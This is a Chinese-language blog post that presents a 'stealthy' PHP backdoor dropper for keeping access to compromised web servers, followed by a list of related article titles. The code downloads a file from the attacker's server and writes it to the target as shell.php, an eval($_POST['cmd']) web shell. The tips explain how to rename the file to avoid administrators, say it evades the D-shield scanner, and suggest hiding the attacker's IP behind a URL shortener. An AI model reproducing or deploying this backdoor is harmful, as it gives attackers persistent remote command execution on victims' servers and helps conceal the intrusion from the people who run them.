簡單又較隱蔽的PHP後門
簡單又較隱蔽的PHP後門
話不多說,直接上程式碼(backdoor.php)
<?php
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(adminer("http://xx.xx.xx.xx/config.txt","shell.php")) {
echo "success, access shell.php";
} else {
echo "fail";
}
?>
Tips1:xx.xx.xx.xx是你的VPS伺服器,config.txt要放在你的伺服器上,並且能訪問。config.txt的內容為一句話,如下:
<?php eval(@$_POST['cmd']);?>
接著訪問backdoor.php檔案即可在目標伺服器上生成一句話後門
Tips2:在實戰中記得把檔名修改一下,否則很容易被管理員發現。
這種許可權維持的方法相對於直接留下一句話檔案要更加穩定,即使管理員將一句話後門檔案刪除了,只要backdoor.php檔案還在,就可以一直生成後門檔案。而且D盾還檢測不出backdoor.php檔案。如果手上沒有免殺PHP後門的朋友們,不妨可以退而求其次,嘗試一下。
Tips3:backdoor.php檔案中會出現你的VPS伺服器IP地址,這在一定程度上會有被反制的風險。那我們可以將URL轉換成短連結進行隱匿。
短連結線上轉換網址:ReURL - 傳送門
短連結還原網址:https://www.donglishuzhai.net/tools/hy.php
經過測試,ReURL生成的短連結,上面的還原網站也還原不出來。
相關文章
- 超級隱蔽之後門技巧
- 幾個簡單又實用的PHP函式PHP函式
- Linux終端注意了!隱蔽性更強的後門木馬Rmgr來了Linux
- 簡單又強大的SHELL
- 簡單又好用的高效工具
- 【技術向】利用ShadowMove巧妙的隱蔽連線
- PHP後門新玩法:一款猥瑣的PHP後門分析PHP
- PHP socket 的簡單理解PHP
- mongodb和hbase的簡單比較MongoDB
- 一次慢查詢暴露的隱蔽問題
- 字串-簡單字串比較字串
- 「補課」進行時:設計模式(16)——簡單又實用的門面模式設計模式
- ChatGPT背後的安全隱患,誰來管比較放心?ChatGPT
- ICMP隱蔽隧道攻擊分析與檢測(二)
- ICMP隱蔽隧道攻擊分析與檢測(三)
- ICMP隱蔽隧道攻擊分析與檢測(四)
- PHP PDO 簡單教程PHP
- Python中那些簡單又好用的特性和用法Python
- 小白入門 - PHP簡介PHP
- 關於 PHP 框架的簡單思考PHP框架
- laragon 簡單好用的 PHP 環境GoPHP
- 簡單的php連線mysql類PHPMySql
- EasyTpl - 簡單快速的 PHP 模板引擎PHP
- java入門最後一章 簡易撲克牌比較大小Java
- 學習內網安全--隱蔽隧道通訊技術內網
- 一個不易發現的PHP後門 --PHP
- php面試簡單整理PHP面試
- 簡單又好用的錄屏軟體——錄大咖
- Proxy:簡單小巧又強大好用的代理系統
- drools的簡單入門案例
- 簡單的 Go 入門教程Go
- 前端動畫效果實現的簡單比較前端動畫
- OPUS裡的Silk和原始Silk簡單比較
- 一個很簡單的PHP框架lyuePHP框架
- php實現一個簡單的socketPHP
- 創造tips的秘籍——PHP回撥後門PHP
- PHP的93個WordPress外掛有後門PHP
- Azkaban 簡單入門